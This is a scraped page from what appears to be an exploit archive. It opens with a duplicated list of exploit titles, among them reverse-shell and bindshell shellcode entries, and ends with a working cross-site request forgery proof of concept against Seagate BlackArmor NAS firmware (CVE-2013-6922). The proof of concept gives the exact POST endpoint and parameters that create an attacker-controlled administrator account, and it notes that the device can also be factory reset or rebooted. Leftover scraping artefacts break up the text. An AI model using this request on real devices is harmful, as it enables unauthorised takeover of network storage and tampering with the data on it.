3739831fb2
16 new exploits Banner Exchange Script 1.0 - (targetid) Blind SQL Injection Vulnerability PHP 5.3.3 - ibase_gen_id() off-by-one Overflow Vulnerability ARM Bindshell port 0x1337 ARM Bind Connect UDP Port 68 ARM Loader Port 0x1337 ARM ifconfig eth0 and Assign Address ARM Bindshell port 0x1337 ARM Bind Connect UDP Port 68 ARM Loader Port 0x1337 ARM ifconfig eth0 and Assign Address G Data TotalCare 2011 - NtOpenKey Race Condition Vulnerability ImpressPages CMS 3.8 - Stored XSS Vulnerability Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability Linux Netcat Reverse Shell - 32bit - 77 bytes PrestaShop 1.4.4.1 modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php Multiple Parameter XSS PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Parameter XSS Getsimple CMS 3.3.10 - Arbitrary File Upload op5 v7.1.9 Configuration Command Execution op5 7.1.9 - Configuration Command Execution Alibaba Clone B2B Script - Arbitrary File Disclosure XuezhuLi FileSharing - Directory Traversal XuezhuLi FileSharing - (Add User) CSRF FinderView - Multiple Vulnerabilities
62 lines
1.1 KiB
Text
Executable file
62 lines
1.1 KiB
Text
Executable file
# Exploit Title: Seagate BlackArmor NAS - Cross Site Request Forgery
|
|
|
|
# Google Dork: N/A
|
|
|
|
# Date: 04-01-2014
|
|
|
|
# Exploit Author: Jeroen - IT Nerdbox
|
|
|
|
# Vendor Homepage: http://www.seagate.com/
|
|
|
|
# Software Link:
|
|
http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
|
|
|
|
# Version: sg2000-2000.1331
|
|
|
|
# Tested on: N/A
|
|
|
|
# CVE : CVE-2013-6922
|
|
|
|
#
|
|
|
|
## Description:
|
|
|
|
#
|
|
|
|
# There are multiple CSRF attacks possible, the proof of concept shows how
|
|
it is possible to add
|
|
|
|
# a user with administrative privileges to the system.
|
|
#
|
|
# It is also possible to:
|
|
|
|
#
|
|
|
|
# 1. Factory reset the device
|
|
|
|
# 2. Reboot the device
|
|
|
|
# 3. Add/Edit/Remove users
|
|
# 4. Add/Edit/Remove shares and volumes
|
|
|
|
#
|
|
# This vulnerability was reported to Seagate in September 2013, they stated
|
|
that this will not be fixed.
|
|
|
|
#
|
|
|
|
## Proof of Concept:
|
|
|
|
#
|
|
|
|
# POST: http(s)://<url |
|
|
ip>/admin/access_control_user_add.php?lang=en&gi=a001&fbt=23
|
|
# Parameters:
|
|
|
|
#
|
|
|
|
# username attacker
|
|
# adminright yes
|
|
# fullname hacker
|
|
# userpasswd attackers_password
|
|
# userpasswdcheck attackers_password
|